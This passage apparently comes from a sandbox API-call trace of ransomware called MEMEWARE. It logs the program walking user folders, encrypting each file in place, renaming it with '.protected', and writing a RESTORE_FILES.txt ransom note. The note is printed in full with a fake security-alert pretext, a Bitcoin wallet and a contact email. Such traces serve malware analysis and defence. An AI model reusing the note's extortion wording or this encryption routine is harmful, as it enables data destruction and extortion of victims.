Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.protected")) returned 1 [0094.652] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.652] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.653] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt") returned 86 [0094.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.653] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.653] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.654] lstrlenA (lpString="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") returned 684 [0094.654] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.654] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.654] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.654] CloseHandle (hObject=0x14c) returned 1 [0094.655] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0094.655] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0094.655] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.655] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0094.655] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0094.656] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.656] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW 
(lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0094.656] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 84 [0094.656] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0094.656] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.658] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.658] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.658] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.658] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.660] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.660] CloseHandle (hObject=0x14c) returned 1 [0094.716] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\WindowsMail.MSMessageStore.protected") returned 94 [0094.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.protected")) returned 1 [0094.717] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0094.717] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0094.717] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.717] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0094.717] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0094.717] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.717] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows 
mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.717] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.717] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0094.718] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.718] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0094.718] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 73 [0094.718] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0094.718] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.719] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.719] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.719] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.719] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.720] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.720] CloseHandle (hObject=0x14c) returned 1 [0094.720] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected") returned 83 [0094.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat.protected")) returned 1 [0094.720] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.720] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.720] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt") returned 75 [0094.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.721] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.721] lstrlenA (lpString="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") returned 684 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.721] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.721] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.721] CloseHandle (hObject=0xd8) returned 1 [0094.722] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Windows") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="Program Files (x86)") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="Windows Media", lpString2="System Volume Information") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media") returned 58 [0094.722] lstrcmpW (lpString1="Windows Media", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="Windows Media", lpString2="..") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*") returned 60 [0094.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.722] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.722] 
lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\.") returned 60 [0094.722] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.722] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.722] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\..") returned 61 [0094.722] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.722] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.722] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Windows") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Program Files") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="Program Files (x86)") returned -1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="$Recycle.bin") returned 1 [0094.722] lstrcmpiW (lpString1="12.0", lpString2="System Volume Information") returned -1 [0094.722] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 63 [0094.722] lstrcmpW (lpString1="12.0", lpString2=".") returned 1 [0094.722] lstrcmpW 
(lpString1="12.0", lpString2="..") returned 1 [0094.722] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned 65 [0094.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.723] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\.") returned 65 [0094.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.723] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.723] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\..") returned 66 [0094.723] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.723] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.723] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) 
returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Windows") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="Program Files (x86)") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="$Recycle.bin") returned 1 [0094.723] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2="System Volume Information") returned 1 [0094.723] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.723] StrStrIW (lpFirst="WMSDKNS.DTD", lpSrch=".protected") returned 0x0 [0094.723] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="RESTORE_FILES.txt") returned 1 [0094.723] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.723] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.724] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0094.724] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".rar") returned 0x0 [0094.724] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0094.724] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".zip") returned 0x0 [0094.724] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0094.725] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1f2, lpOverlapped=0x0) returned 1 [0094.725] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.725] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.725] CloseHandle (hObject=0x150) returned 1 [0094.725] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.protected") returned 85 [0094.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Media\\12.0\\WMSDKNS.DTD.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.protected")) returned 1 [0094.726] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Windows") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="Program Files (x86)") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="$Recycle.bin") returned 1 [0094.726] lstrcmpiW (lpString1="WMSDKNS.XML", lpString2="System Volume Information") returned 1 [0094.726] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0094.726] StrStrIW (lpFirst="WMSDKNS.XML", lpSrch=".protected") returned 0x0 [0094.726] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="RESTORE_FILES.txt") returned 1 [0094.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.726] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, 